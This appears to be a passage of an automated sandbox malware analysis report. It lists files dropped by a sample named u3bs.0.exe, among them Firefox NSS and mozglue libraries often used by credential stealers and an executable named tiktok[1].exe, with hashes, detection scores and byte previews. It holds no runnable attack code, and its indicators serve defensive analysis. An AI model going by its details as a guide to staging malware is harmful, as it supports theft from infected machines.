Process:	C:\Users\user\AppData\Local\Temp\u3bs.0.exe
File Type:	ASCII text, with very long lines (1024), with CRLF line terminators
Category:	dropped
Size (bytes):	1026
Entropy (8bit):	4.700014595314478
Encrypted:	false
SSDEEP:	24:ZUpld6DFp3zvtLC4Tmg3c0x2ngfNqdsD1OqVMyUXHt/Sv0vyjsbsV:upqDL3hO4TRc4Eq8tKvYgV
MD5:	960373CA97DEDBA8576ECF40D0D1E39D
SHA1:	E89C5AC4CF0B920C373CFA7D365C40C1009A14F6
SHA-256:	501DC438F0E931ABED9FDE388BA5A8FAE8445117823118C413F54793F0E10FD7
SHA-512:	93B34F6BC4DCEA41103E31272F2DC9CF07CC100F934CECC8F4317525DA65128DBBAD75B23CE40D46EE1DC11D10147250CAE33F01220F5624E2406B2596B726EB
Malicious:	false
Preview:	YPSIACHYXWDOAOALJCJYYKHKMGYIZBYLJSULATZCLAKGTHKIZZZPZMBAJFNQKRWGKHDEEYLGCRMYXVOJCXPRDOFVVXDFSZNRLGLUNBQSCSVJXKHLUFNOKRCASVQNUJDYWNWTNGJYBIKCERFIRWTZVUUNKNCMUGKTMSRIVLFQTZDVSHZTYRURNPZRSHICVPPIWUNOSYRCNVXHOFETKZDTIEIOQHCHWHDXEDXBZFSWIFFLXTXQXUBJCTQSDGVAMQKTUHJAAEDEECWFOEDCAALGNKEQRGJPVEEVJPTSROUZFPHKPUHLAYRHVULFESXXGKSAIYLAVSWMISSCMRGVQGXFGFYXBQBRZHILLZQUJRQJHUVBFDBPCNUAKOXURUUUKQNRUEAXAAXWIVATBILRXVUBDTFNWUQLPZELETXDQPCWJXRRAQILAVVZFAMGUWUYYORCQNUYLSNLTNXIAWJVDTPNCZPHSWYWWTBBJECMEGHRCATJANBKSCMLVOBOTXPKGMTOJISGOTUUOFVJPAGNMHFSAFRHQUHMYURLAJVNZPEMNMUDZAUMRZHQJBWVCUSQAENWUTRFBUFUWIPJYVLYDUIBJSTTFGSFBHTKIXJNVJUYJGSHZHMDONOHBMLQDTHGTPLYVKGUXWHEYTHTWOOMQOGUFQGRWUYBVWILTRHBAIJHZKXNAQYAIZBPYWWZSBDWNPRWGFXHNPFFMHKCCERIWCTACKIVXLZBNOTBYDOPJBYTZWNSXYXVYPHAGUHBXKPPAFNZGWEKOBPXTCLBIOEIVWLELPXJAINCDBEUOIFMNFWSRDONSGUCNGDZLIAFVNUQXZMTVJLIACGEXXESAGRKCPJNTKZHMMCTJZCLWNTNEJFUCODLVBCJHINWJYBLRXSKLVKNYGPLXGKEHMXSDKIAPHRGHBOCHQEJPMJEKRMRTLJNYNRHDPPQKJHXGYJMDUOESMBVJOBKJWUUSSZEQAGHANSYFBHIZFXSLENBLJWCHGEM

C:\ProgramData\freebl3.dll

Download File

Process:	C:\Users\user\AppData\Local\Temp\u3bs.0.exe
File Type:	PE32 executable (DLL) (GUI) Intel 80386, for MS Windows
Category:	dropped
Size (bytes):	685392
Entropy (8bit):	6.872871740790978
Encrypted:	false
SSDEEP:	12288:4gPbPpxMofhPNN0+RXBrp3M5pzRN4l2SQ+PEu9tUs/abAQb51FW/IzkOfWPO9UN7:4gPbPp9NNP0BgInfW2WMC4M+hW
MD5:	550686C0EE48C386DFCB40199BD076AC
SHA1:	EE5134DA4D3EFCB466081FB6197BE5E12A5B22AB
SHA-256:	EDD043F2005DBD5902FC421EABB9472A7266950C5CBACA34E2D590B17D12F5FA
SHA-512:	0B7F47AF883B99F9FBDC08020446B58F2F3FA55292FD9BC78FC967DD35BDD8BD549802722DE37668CC89EDE61B20359190EFBFDF026AE2BDC854F4740A54649E
Malicious:	true
Antivirus:	Antivirus: ReversingLabs, Detection: 0% Antivirus: Virustotal, Detection: 0%, Browse
Joe Sandbox View:	Filename: VucRf0jboS.exe, Detection: malicious, Browse Filename: kO1P1YnLst.exe, Detection: malicious, Browse Filename: wxfSIz4PAi.exe, Detection: malicious, Browse Filename: file.exe, Detection: malicious, Browse Filename: file.exe, Detection: malicious, Browse Filename: JHqNlw9U8c.exe, Detection: malicious, Browse Filename: file.exe, Detection: malicious, Browse Filename: file.exe, Detection: malicious, Browse Filename: QPoX60yhZt.exe, Detection: malicious, Browse Filename: 3R18jv6iGv.exe, Detection: malicious, Browse
Preview:	MZx.....................@...................................x...........!..L.!This program cannot be run in DOS mode.$..PE..L....4.c.........."!.........4......p.....................................................@A........................H...S...............x............F..P/.......#................................... ..................@............................text............................... ..`.rdata....... ......................@..@.data...<F...0......................@....00cfg..............................@..@.rsrc...x...........................@..@.reloc...#.......$..."..............@..B........................................................................................................................................................................................................................................................................................................................................................................................................

C:\ProgramData\iolo\logs\WSComm.log

Download File

Process:	C:\Users\user\AppData\Local\Temp\u3bs.3.exe
File Type:	ASCII text, with CRLF line terminators
Category:	dropped
Size (bytes):	173
Entropy (8bit):	5.159332313104969
Encrypted:	false
SSDEEP:	3:qRTW1R03Yi0qQCfkMP2D0TcLEtRNGcSZeE34LovqTW1R5JMIcLlilYFxOv:qlf0TCfk3VotGjZb34L2/Qiloe
MD5:	2DCF1B7A7BAD97A444B7C78A1AAAD58D
SHA1:	1A983522C62DB1E2D36324408893002CE1A9FEB3
SHA-256:	3F8EA5A58BDFF625A07ADC53AC17E3DF81F6767038828BF761F0B96057523A75
SHA-512:	7350A3D12E81D5F256FFB777C1BC013833DC6EB5E34CD399C83373F4A3797FBE6104EBBF26E2407FA4E7B789D43DB7A82B38F23A46B108BCEE15748D4BA8052A
Malicious:	false
Preview:	[04/27/24 02:20:46] PerformGetOrPost : Attempting a POST on http://svc.iolo.com/__svc/sbv/DownloadManager.ashx...[04/27/24 02:20:48] IsValidCommunication : Result := True...

C:\ProgramData\mozglue.dll

Download File

Process:	C:\Users\user\AppData\Local\Temp\u3bs.0.exe
File Type:	PE32 executable (DLL) (GUI) Intel 80386, for MS Windows
Category:	dropped
Size (bytes):	608080
Entropy (8bit):	6.833616094889818
Encrypted:	false
SSDEEP:	12288:BlSyAom/gcRKMdRm4wFkRHuyG4RRGJVDjMk/x21R8gY/r:BKgcRKMdRm4wFkVVDGJVv//x21R8br
MD5:	C8FD9BE83BC728CC04BEFFAFC2907FE9
SHA1:	95AB9F701E0024CEDFBD312BCFE4E726744C4F2E
SHA-256:	BA06A6EE0B15F5BE5C4E67782EEC8B521E36C107A329093EC400FE0404EB196A
SHA-512:	FBB446F4A27EF510E616CAAD52945D6C9CC1FD063812C41947E579EC2B54DF57C6DC46237DED80FCA5847F38CBE1747A6C66A13E2C8C19C664A72BE35EB8B040
Malicious:	true
Antivirus:	Antivirus: ReversingLabs, Detection: 0% Antivirus: Virustotal, Detection: 0%, Browse
Joe Sandbox View:	Filename: VucRf0jboS.exe, Detection: malicious, Browse Filename: kO1P1YnLst.exe, Detection: malicious, Browse Filename: wxfSIz4PAi.exe, Detection: malicious, Browse Filename: file.exe, Detection: malicious, Browse Filename: file.exe, Detection: malicious, Browse Filename: JHqNlw9U8c.exe, Detection: malicious, Browse Filename: file.exe, Detection: malicious, Browse Filename: file.exe, Detection: malicious, Browse Filename: QPoX60yhZt.exe, Detection: malicious, Browse Filename: 3R18jv6iGv.exe, Detection: malicious, Browse
Preview:	MZx.....................@...................................x...........!..L.!This program cannot be run in DOS mode.$..PE..L....4.c.........."!.........^......................................................j.....@A.........................`...W.....,.... ..................P/...0...A...S..............................h.......................Z.......................text...a........................... ..`.rdata..............................@..@.data...D...........................@....00cfg..............................@..@.tls................................@....rsrc........ ......................@..@.reloc...A...0...B..................@..B................................................................................................................................................................................................................................................................................................................................................................

C:\ProgramData\msvcp140.dll

Download File

Process:	C:\Users\user\AppData\Local\Temp\u3bs.0.exe
File Type:	PE32 executable (DLL) (console) Intel 80386, for MS Windows
Category:	dropped
Size (bytes):	450024
Entropy (8bit):	6.673992339875127
Encrypted:	false
SSDEEP:	12288:McPa9C9VbL+3Omy5CvyOvzeOKdqhUgiW6QR7t5s03Ooc8dHkC2esGAWf:McPa90Vbky5CvyUeOKn03Ooc8dHkC2eN
MD5:	5FF1FCA37C466D6723EC67BE93B51442
SHA1:	34CC4E158092083B13D67D6D2BC9E57B798A303B
SHA-256:	5136A49A682AC8D7F1CE71B211DE8688FCE42ED57210AF087A8E2DBC8A934062
SHA-512:	4802EF62630C521D83A1D333969593FB00C9B38F82B4D07F70FBD21F495FEA9B3F67676064573D2C71C42BC6F701992989742213501B16087BB6110E337C7546
Malicious:	false
Antivirus:	Antivirus: ReversingLabs, Detection: 0% Antivirus: Virustotal, Detection: 0%, Browse
Preview:	MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$........1C.._..._..._.)n...._......._...^."._..^..._..\..._..[..._..Z..._.._..._......_..]..._.Rich.._.........................PE..L.....0].........."!.....(..........`........@......................................,.....@A.........................g.......r...........................A.......=..`x..8............................w..@............p.......c..@....................text....&.......(.................. ..`.data...H)...@.......,..............@....idata.......p.......D..............@..@.didat..4............X..............@....rsrc................Z..............@..@.reloc...=.......>...^..............@..B................................................................................................................................................................................................................................................................

C:\ProgramData\nss3.dll

Download File

Process:	C:\Users\user\AppData\Local\Temp\u3bs.0.exe
File Type:	PE32 executable (DLL) (GUI) Intel 80386, for MS Windows
Category:	dropped
Size (bytes):	2046288
Entropy (8bit):	6.787733948558952
Encrypted:	false
SSDEEP:	49152:fECf12gikHlnKGxJRIB+y5nvxnaOSJ3HFNWYrVvE4CQsgzMmQfTU1NrWmy4KoAzh:J7Tf8J1Q+SS5/nr
MD5:	1CC453CDF74F31E4D913FF9C10ACDDE2
SHA1:	6E85EAE544D6E965F15FA5C39700FA7202F3AAFE
SHA-256:	AC5C92FE6C51CFA742E475215B83B3E11A4379820043263BF50D4068686C6FA5
SHA-512:	DD9FF4E06B00DC831439BAB11C10E9B2AE864EA6E780D3835EA7468818F35439F352EF137DA111EFCDF2BB6465F6CA486719451BF6CF32C6A4420A56B1D64571
Malicious:	true
Antivirus:	Antivirus: ReversingLabs, Detection: 0% Antivirus: Virustotal, Detection: 0%, Browse
Preview:	MZx.....................@...................................x...........!..L.!This program cannot be run in DOS mode.$..PE..L....4.c.........."!................`........................................p......l- ...@A.........................&..........@....P..x...............P/...`..\...................................................\|...\....&..@....................text............................... ..`.rdata..l...........................@..@.data...DR..........................@....00cfg.......@......................@..@.rsrc...x....P......................@..@.reloc..\....`......................@..B........................................................................................................................................................................................................................................................................................................................................................................................................

C:\ProgramData\softokn3.dll

Download File

Process:	C:\Users\user\AppData\Local\Temp\u3bs.0.exe
File Type:	PE32 executable (DLL) (GUI) Intel 80386, for MS Windows
Category:	dropped
Size (bytes):	257872
Entropy (8bit):	6.727482641240852
Encrypted:	false
SSDEEP:	6144:/yF/zX2zfRkU62THVh/T2AhZxv6A31obD6Hq/8jis+FvtVRpsAAs0o8OqTYz+xnU:/yRzX2zfRkX2T1h/SA5PF9m8jJqKYz+y
MD5:	4E52D739C324DB8225BD9AB2695F262F
SHA1:	71C3DA43DC5A0D2A1941E874A6D015A071783889
SHA-256:	74EBBAC956E519E16923ABDC5AB8912098A4F64E38DDCB2EAE23969F306AFE5A
SHA-512:	2D4168A69082A9192B9248F7331BD806C260478FF817567DF54F997D7C3C7D640776131355401E4BDB9744E246C36D658CB24B18DE67D8F23F10066E5FE445F6
Malicious:	true
Antivirus:	Antivirus: ReversingLabs, Detection: 0% Antivirus: Virustotal, Detection: 0%, Browse
Preview:	MZx.....................@...................................x...........!..L.!This program cannot be run in DOS mode.$..PE..L....4.c.........."!................P...............................................Sg....@A........................Dv..S....w..........................P/.......5..8q...............................................{...............................text...&........................... ..`.rdata.............................@..@.data................\|..............@....00cfg..............................@..@.rsrc...............................@..@.reloc...5.......6..................@..B........................................................................................................................................................................................................................................................................................................................................................................................................

C:\ProgramData\vcruntime140.dll

Download File

Process:	C:\Users\user\AppData\Local\Temp\u3bs.0.exe
File Type:	PE32 executable (DLL) (console) Intel 80386, for MS Windows
Category:	dropped
Size (bytes):	80880
Entropy (8bit):	6.920480786566406
Encrypted:	false
SSDEEP:	1536:lw2886xv555et/MCsjw0BuRK3jteo3ecbA2W86b+Ld:lw28V55At/zqw+Iq9ecbA2W8H
MD5:	A37EE36B536409056A86F50E67777DD7
SHA1:	1CAFA159292AA736FC595FC04E16325B27CD6750
SHA-256:	8934AAEB65B6E6D253DFE72DEA5D65856BD871E989D5D3A2A35EDFE867BB4825
SHA-512:	3A7C260646315CF8C01F44B2EC60974017496BD0D80DD055C7E43B707CADBA2D63AAB5E0EFD435670AA77886ED86368390D42C4017FC433C3C4B9D1C47D0F356
Malicious:	false
Antivirus:	Antivirus: ReversingLabs, Detection: 0% Antivirus: Virustotal, Detection: 0%, Browse
Preview:	MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$......................08e...................................................u............Rich............PE..L...\|.0].........."!.........................................................0.......m....@A.............................................................A... ....... ..8............................ ..@............................................text............................... ..`.data...............................@....idata..............................@..@.rsrc...............................@..@.reloc....... ......................@..B................................................................................................................................................................................................................................................................................................................................

C:\Users\user\AppData\Local\Microsoft\CLR_v4.0_32\UsageLogs\MSBuild.exe.log

Download File

Process:	C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe
File Type:	ASCII text, with CRLF line terminators
Category:	dropped
Size (bytes):	410
Entropy (8bit):	5.361827289088002
Encrypted:	false
SSDEEP:	12:Q3La/KDLI4MWuPTAq1KDLI4M0kvoDLI4MWuCv:ML9E4KH1qE4jE4Ks
MD5:	812F0A8C671812AA613FC139B69E8614
SHA1:	B4177437C50B25B06FB885362DA36FD171A1C5A9
SHA-256:	6D3DF2C3EA20D3A411078200AFA62DAC6AABA4210C83A2186E80195977BF0F89
SHA-512:	6A82C1F195C66FCC0533B20B8AE9B4F9CEBED6C8D7B450C574E864A60D627F3ABE32081BF65822157716F4672180E19C0DFA91D88663F7FC3CBE7FD0EB36B2EA
Malicious:	false
Preview:	1,"fusion","GAC",0..1,"WinRT","NotApp",1..3,"System, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089","C:\Windows\assembly\NativeImages_v4.0.30319_32\System\920e3d1d70447c3c10e69e6df0766568\System.ni.dll",0..2,"System.Drawing, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b03f5f7f11d50a3a",0..2,"System.Windows.Forms, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089",0..

C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\3D003UC5\freebl3[1].dll

Download File

Process:	C:\Users\user\AppData\Local\Temp\u3bs.0.exe
File Type:	PE32 executable (DLL) (GUI) Intel 80386, for MS Windows
Category:	dropped
Size (bytes):	685392
Entropy (8bit):	6.872871740790978
Encrypted:	false
SSDEEP:	12288:4gPbPpxMofhPNN0+RXBrp3M5pzRN4l2SQ+PEu9tUs/abAQb51FW/IzkOfWPO9UN7:4gPbPp9NNP0BgInfW2WMC4M+hW
MD5:	550686C0EE48C386DFCB40199BD076AC
SHA1:	EE5134DA4D3EFCB466081FB6197BE5E12A5B22AB
SHA-256:	EDD043F2005DBD5902FC421EABB9472A7266950C5CBACA34E2D590B17D12F5FA
SHA-512:	0B7F47AF883B99F9FBDC08020446B58F2F3FA55292FD9BC78FC967DD35BDD8BD549802722DE37668CC89EDE61B20359190EFBFDF026AE2BDC854F4740A54649E
Malicious:	true
Antivirus:	Antivirus: ReversingLabs, Detection: 0% Antivirus: Virustotal, Detection: 0%, Browse
Preview:	MZx.....................@...................................x...........!..L.!This program cannot be run in DOS mode.$..PE..L....4.c.........."!.........4......p.....................................................@A........................H...S...............x............F..P/.......#................................... ..................@............................text............................... ..`.rdata....... ......................@..@.data...<F...0......................@....00cfg..............................@..@.rsrc...x...........................@..@.reloc...#.......$..."..............@..B........................................................................................................................................................................................................................................................................................................................................................................................................

C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\3D003UC5\mozglue[1].dll

Download File

Process:	C:\Users\user\AppData\Local\Temp\u3bs.0.exe
File Type:	PE32 executable (DLL) (GUI) Intel 80386, for MS Windows
Category:	dropped
Size (bytes):	608080
Entropy (8bit):	6.833616094889818
Encrypted:	false
SSDEEP:	12288:BlSyAom/gcRKMdRm4wFkRHuyG4RRGJVDjMk/x21R8gY/r:BKgcRKMdRm4wFkVVDGJVv//x21R8br
MD5:	C8FD9BE83BC728CC04BEFFAFC2907FE9
SHA1:	95AB9F701E0024CEDFBD312BCFE4E726744C4F2E
SHA-256:	BA06A6EE0B15F5BE5C4E67782EEC8B521E36C107A329093EC400FE0404EB196A
SHA-512:	FBB446F4A27EF510E616CAAD52945D6C9CC1FD063812C41947E579EC2B54DF57C6DC46237DED80FCA5847F38CBE1747A6C66A13E2C8C19C664A72BE35EB8B040
Malicious:	true
Antivirus:	Antivirus: ReversingLabs, Detection: 0% Antivirus: Virustotal, Detection: 0%, Browse
Preview:	MZx.....................@...................................x...........!..L.!This program cannot be run in DOS mode.$..PE..L....4.c.........."!.........^......................................................j.....@A.........................`...W.....,.... ..................P/...0...A...S..............................h.......................Z.......................text...a........................... ..`.rdata..............................@..@.data...D...........................@....00cfg..............................@..@.tls................................@....rsrc........ ......................@..@.reloc...A...0...B..................@..B................................................................................................................................................................................................................................................................................................................................................................

C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\3D003UC5\msvcp140[1].dll

Download File

Process:	C:\Users\user\AppData\Local\Temp\u3bs.0.exe
File Type:	PE32 executable (DLL) (console) Intel 80386, for MS Windows
Category:	dropped
Size (bytes):	450024
Entropy (8bit):	6.673992339875127
Encrypted:	false
SSDEEP:	12288:McPa9C9VbL+3Omy5CvyOvzeOKdqhUgiW6QR7t5s03Ooc8dHkC2esGAWf:McPa90Vbky5CvyUeOKn03Ooc8dHkC2eN
MD5:	5FF1FCA37C466D6723EC67BE93B51442
SHA1:	34CC4E158092083B13D67D6D2BC9E57B798A303B
SHA-256:	5136A49A682AC8D7F1CE71B211DE8688FCE42ED57210AF087A8E2DBC8A934062
SHA-512:	4802EF62630C521D83A1D333969593FB00C9B38F82B4D07F70FBD21F495FEA9B3F67676064573D2C71C42BC6F701992989742213501B16087BB6110E337C7546
Malicious:	false
Antivirus:	Antivirus: ReversingLabs, Detection: 0% Antivirus: Virustotal, Detection: 0%, Browse
Preview:	MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$........1C.._..._..._.)n...._......._...^."._..^..._..\..._..[..._..Z..._.._..._......_..]..._.Rich.._.........................PE..L.....0].........."!.....(..........`........@......................................,.....@A.........................g.......r...........................A.......=..`x..8............................w..@............p.......c..@....................text....&.......(.................. ..`.data...H)...@.......,..............@....idata.......p.......D..............@..@.didat..4............X..............@....rsrc................Z..............@..@.reloc...=.......>...^..............@..B................................................................................................................................................................................................................................................................

C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\3D003UC5\nss3[1].dll

Download File

Process:	C:\Users\user\AppData\Local\Temp\u3bs.0.exe
File Type:	PE32 executable (DLL) (GUI) Intel 80386, for MS Windows
Category:	dropped
Size (bytes):	2046288
Entropy (8bit):	6.787733948558952
Encrypted:	false
SSDEEP:	49152:fECf12gikHlnKGxJRIB+y5nvxnaOSJ3HFNWYrVvE4CQsgzMmQfTU1NrWmy4KoAzh:J7Tf8J1Q+SS5/nr
MD5:	1CC453CDF74F31E4D913FF9C10ACDDE2
SHA1:	6E85EAE544D6E965F15FA5C39700FA7202F3AAFE
SHA-256:	AC5C92FE6C51CFA742E475215B83B3E11A4379820043263BF50D4068686C6FA5
SHA-512:	DD9FF4E06B00DC831439BAB11C10E9B2AE864EA6E780D3835EA7468818F35439F352EF137DA111EFCDF2BB6465F6CA486719451BF6CF32C6A4420A56B1D64571
Malicious:	true
Antivirus:	Antivirus: ReversingLabs, Detection: 0% Antivirus: Virustotal, Detection: 0%, Browse
Preview:	MZx.....................@...................................x...........!..L.!This program cannot be run in DOS mode.$..PE..L....4.c.........."!................`........................................p......l- ...@A.........................&..........@....P..x...............P/...`..\...................................................\|...\....&..@....................text............................... ..`.rdata..l...........................@..@.data...DR..........................@....00cfg.......@......................@..@.rsrc...x....P......................@..@.reloc..\....`......................@..B........................................................................................................................................................................................................................................................................................................................................................................................................

C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\3D003UC5\softokn3[1].dll

Download File

Process:	C:\Users\user\AppData\Local\Temp\u3bs.0.exe
File Type:	PE32 executable (DLL) (GUI) Intel 80386, for MS Windows
Category:	dropped
Size (bytes):	257872
Entropy (8bit):	6.727482641240852
Encrypted:	false
SSDEEP:	6144:/yF/zX2zfRkU62THVh/T2AhZxv6A31obD6Hq/8jis+FvtVRpsAAs0o8OqTYz+xnU:/yRzX2zfRkX2T1h/SA5PF9m8jJqKYz+y
MD5:	4E52D739C324DB8225BD9AB2695F262F
SHA1:	71C3DA43DC5A0D2A1941E874A6D015A071783889
SHA-256:	74EBBAC956E519E16923ABDC5AB8912098A4F64E38DDCB2EAE23969F306AFE5A
SHA-512:	2D4168A69082A9192B9248F7331BD806C260478FF817567DF54F997D7C3C7D640776131355401E4BDB9744E246C36D658CB24B18DE67D8F23F10066E5FE445F6
Malicious:	true
Antivirus:	Antivirus: ReversingLabs, Detection: 0% Antivirus: Virustotal, Detection: 0%, Browse
Preview:	MZx.....................@...................................x...........!..L.!This program cannot be run in DOS mode.$..PE..L....4.c.........."!................P...............................................Sg....@A........................Dv..S....w..........................P/.......5..8q...............................................{...............................text...&........................... ..`.rdata.............................@..@.data................\|..............@....00cfg..............................@..@.rsrc...............................@..@.reloc...5.......6..................@..B........................................................................................................................................................................................................................................................................................................................................................................................................

C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\3D003UC5\tiktok[1].exe

Download File

Process:	C:\Users\user\AppData\Local\Temp\u3bs.0.exe
File Type:	PE32 executable (GUI) Intel 80386, for MS Windows
Category:	dropped
Size (bytes):	545792
Entropy (8bit):	6.384805269039956
Encrypted:	false
SSDEEP:	6144:yU3iKBTO7hQqRGoFyLmVmH6Q4vwRuGuoBhYkuFqeYAOfp+5ic6/:yU7UVGoFyLmVO6Q6wAGuoBh9Np+M/
MD5:	6C93FC68E2F01C20FB81AF24470B790C
SHA1:	D5927B38A32E30AFCF5A658612A8266476FC4AD8
SHA-256:	64A71B664D76641B35DAC312161CB356B3B3B5F0B45C9D88C8AFA547B4902580
SHA-512:	355E9677121EF17CF8C398F0C17399776D206C62014080A2C62682E1152EA0729DCC6E233358DCD6BAE009B07E3DB936D4B18EB37D6E7EBC2FE9CF8D827C4ADE
Malicious:	true
Antivirus:	Antivirus: ReversingLabs, Detection: 47% Antivirus: Virustotal, Detection: 72%, Browse
Preview:	MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......c...'i..'i..'i....[.7i....Y..i....X.8i...7..3i...7...i...7...i....9."i..'i..}i...7..%i...7U.&i..'i=.&i...7..&i..Rich'i..................PE..L....v)f..........................................@.......................................@.................................P...(.......@(................... ..l.......p........................... ...@............................................text...1........................... ..`.rdata..............................@..@.data...@ ..........................@....gfids..............................@..@.rsrc...@(.......*..................@..@.reloc..l.... ......................@..B........................................................................................................................................................................................................................................................

C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\3D003UC5\vcruntime140[1].dll

Download File

Process:	C:\Users\user\AppData\Local\Temp\u3bs.0.exe
File Type:	PE32 executable (DLL) (console) Intel 80386, for MS Windows
Category:	dropped
Size (bytes):	80880
Entropy (8bit):	6.920480786566406
Encrypted:	false
SSDEEP:	1536:lw2886xv555et/MCsjw0BuRK3jteo3ecbA2W86b+Ld:lw28V55At/zqw+Iq9ecbA2W8H
MD5:	A37EE36B536409056A86F50E67777DD7
SHA1:	1CAFA159292AA736FC595FC04E16325B27CD6750
SHA-256:	8934AAEB65B6E6D253DFE72DEA5D65856BD871E989D5D3A2A35EDFE867BB4825
SHA-512:	3A7C260646315CF8C01F44B2EC60974017496BD0D80DD055C7E43B707CADBA2D63AAB5E0EFD435670AA77886ED86368390D42C4017FC433C3C4B9D1C47D0F356
Malicious:	false
Antivirus:	Antivirus: ReversingLabs, Detection: 0% Antivirus: Virustotal, Detection: 0%, Browse
Preview:	MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$......................08e...................................................u............Rich............PE..L...\|.0].........."!.........................................................0.......m....@A.............................................................A... ....... ..8............................ ..@............................................text............................... ..`.data...............................@....idata..............................@..@.rsrc...............................@..@.reloc....... ......................@..B................................................................................................................................................................................................................................................................................................................................

C:\Users\user\AppData\Local\Temp\HDBKJEGIEB.exe

Download File

Process:	C:\Users\user\AppData\Local\Temp\u3bs.0.exe
File Type:	PE32 executable (GUI) Intel 80386, for MS Windows
Category:	dropped
Size (bytes):	545792
Entropy (8bit):	6.384805269039956
Encrypted:	false
SSDEEP:	6144:yU3iKBTO7hQqRGoFyLmVmH6Q4vwRuGuoBhYkuFqeYAOfp+5ic6/:yU7UVGoFyLmVO6Q6wAGuoBh9Np+M/
MD5:	6C93FC68E2F01C20FB81AF24470B790C
SHA1:	D5927B38A32E30AFCF5A658612A8266476FC4AD8
SHA-256:	64A71B664D76641B35DAC312161CB356B3B3B5F0B45C9D88C8AFA547B4902580
SHA-512:	355E9677121EF17CF8C398F0C17399776D206C62014080A2C62682E1152EA0729DCC6E233358DCD6BAE009B07E3DB936D4B18EB37D6E7EBC2FE9CF8D827C4ADE
Malicious:	true
Antivirus:	Antivirus: ReversingLabs, Detection: 47% Antivirus: Virustotal, Detection: 72%, Browse
Preview:	MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......c...'i..'i..'i....[.7i....Y..i....X.8i...7..3i...7...i...7...i....9."i..'i..}i...7..%i...7U.&i..'i=.&i...7..&i..Rich'i..................PE..L....v)f..........................................@.......................................@.................................P...(.......@(................... ..l.......p........................... ...@............................................text...1........................... ..`.rdata..............................@..@.data...@ ..........................@....gfids..............................@..@.rsrc...@(.......*..................@..@.reloc..l.... ......................@..B........................................................................................................................................................................................................................................................

C:\Users\user\AppData\Local\Temp\bd2f8780

Download File

Process:	C:\Users\user\AppData\Local\Temp\u3bs.2\run.exe
File Type:	data
Category:	dropped
Size (bytes):	1514213
Entropy (8bit):	7.762279979167416
Encrypted:	false
SSDEEP:	24576:PL8X8agz3LJ/97RhYDqexjSsnzZySqrl0mfFcN5HC90vdb0icsSStMVADbgcjj/:gRCPneBtLmw5i90R2s4AP1jj/
MD5:	5BCD410B842DEDA0076155B57A6DA08A
SHA1:	BDC1CBFF9B4D3D5B4EDC086ECE0120223A00E517
SHA-256:	1AA33A598D00D9B48BCFF3A33DC49FE988871B5B9A5F07A62D502A8670ED7AD7
SHA-512:	7DC5369510CBB566F68738598315CC211CD5D3E14E56CD9215BE319B1153EFEA4700E71ACF511716A8295D3566EEEFED30D53AAF671A7FEC5B6550934C99FFD3
Malicious:	false
Preview:	.FQ.FQ.FQ.FQ.FQ.FQ.FQ.FQ.FQ.FQ.FQ.FQ.FQ.FQ.FQ.FQ.FQ.FQ.FQ.FQ.FQ.FQ.FQ.FQ.FQ.FQ.FQ.FQ.FQ.FQ.FQ.FQ.FQ.FQ.FQ.FQ.FQ.FQ.FQ.FQ.FQ.FQ.FQ.FQ.FQ.FQ.FQ.FQ.FQ.FQ.FQ.FQ.FQ.FQ.FQ.FQ.FQ.FQ.FQ.FQ.FQ.FQ.FQ.FQ.FQ.FQ.FQ.FQ.FQ.FQ.FQ.FQ.FQ.FQ.FQ.FQ.FQ.FQ.FQ.FQ.FQ.FQ.FQ.FQ.FQ.FQ.FQ.FQ.FQ.FQ.FQ.FQ.FQ.FQ.FQ.FQ.FQ.FQ.FQ.FQ.FQ.FQ.FQ.FQ.FQ.FQ.FQ.FQ.FQ.FQ.FQ.FQ.FQ.FQ.FQ.FQ.FQ.FQ.FQ.FQ.FQ.FQ.FQ.FQ.FQ.FQ.FQ.FQ.FQ.FQ.FQ.FQ.FQ.FQ.FQ.FQ.FP.............4>.. %../?..1"..20..f...3...)6..+"..20..3!.FQ.FQ.FQ.FQ.FQ.FQ.FQ.FQ.FQ.FQ.FQ..)...28../+..>Q.FQ.FQ.FQ.FQ.FQ.FQ.FQ.FQ.FQ.FQ.FQ.FQ.FQ.FQ.FQ.FQ.FQ.FQ.FQ.FQ.FQ..)...'%..("..(2..FQ.FQ.FQ.FQ.FQ.FQ.FQ.FQ.FQ.FQ.FQ.FQ.FQ.FQ.FQ.FQ.FQ.FQ.FQ.FQ.FQ..........8..)"..2.......'<..)#..FQ.FQ.FQ.FQ.FQ.FQ.FQ.FQ.FQ.FQ.FQ.FQ.FQ.FQ.FQ.FQ.FQ..t..sa.qQ.FQ.FQ.FQ.FQ.FQ.FQ.FQ.FQ.FQ.FQ.

C:\Users\user\AppData\Local\Temp\bxhlahunbhc

Download File

Process:	C:\Windows\SysWOW64\cmd.exe
File Type:	PE32 executable (GUI) Intel 80386 Mono/.Net assembly, for MS Windows
Category:	dropped
Size (bytes):	786944
Entropy (8bit):	6.809298494568767
Encrypted:	false
SSDEEP:	12288:wvsXZv8km0OHcbGbvzWHz0Hnquwxe+w0ssFWylkkoAbtEjrwfNqbYS2VbICKMIUO:jfPz0Hynw0ssFlSjT7L
MD5:	5AEBA331CE853D10C82B56ADC96C9E80
SHA1:	A208059F9591712ABF451114815B693AB14A5AB3
SHA-256:	EC51C3B08183CFE851DC93877A6F5B38CA8DD2E5D68E014A2B44C98078ED3434
SHA-512:	5DAACA835F0C9F5691D79CDDE45EF6887EACA6123F65994F8A90A42FF63B35DF6605F673E671004CC8F61B7EE0671ED9F25841A2D9EFEFF5EFC8DA8391CC6676
Malicious:	true
